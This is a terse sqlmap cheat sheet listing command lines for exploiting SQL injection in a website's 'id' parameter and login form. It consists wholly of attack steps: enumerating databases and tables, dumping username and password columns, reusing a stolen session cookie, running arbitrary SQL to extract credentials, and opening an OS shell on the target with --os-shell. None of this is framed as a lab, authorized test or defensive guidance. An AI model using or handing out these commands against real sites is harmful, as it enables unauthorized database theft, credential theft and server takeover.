check (id) vulnerable or not:
sqlmap -u http://www.Site_Address/PAGE.php?id=12
Fetch all the databases in the server:
sqlmap -u http://www.Site_Address/PAGE.php?id=12 --dbs
or
Fetch only the database related to the current website:
sqlmap -u http://www.Site_Address/PAGE.php?id=12 --current-db
Fetch the tables in the current database(DB_Name):
sqlmap -u http://www.Site_Address/PAGE.php?id=12 -D DB_Name --tables
Fetch only the table(TBL_Name) information required:
sqlmap -u http://www.Site_Address/PAGE.php?id=12 -D DB_Name -T TBL_Name --columns
Get the total information in the table(TBL_Name):
sqlmap -u http://www.Site_Address/PAGE.php?id=12 -D DB_Name -T TBL_Name -C id,passwrd,u_name --dump
Dump all the entries of the table(TBL_Name):
sqlmap -u http://www.Site_Address/PAGE.php?id=12 -D DB_Name -T TBL_Name -C TBL_Name --dump-all
To get the shell of the target:
sqlmap -u http://www.Site_Address/PAGE.php?id=12 --os-shell
Special cases:
if you are logged in use that session:
-H 'Cookie: PHP-SESN-ID=ID-GOES-HERE'
Test POST parameter with sqlmap:
sqlmap --data "username=xyz&password=xyz&submit=xyz" -u "http://www.Site_Address/login.php"
Manual SQL Querry using SQLMAP:
sqlmap -u http://www.Site_Address/PAGE.php?id=12 --sql-query='select id,username,password from users where id=1'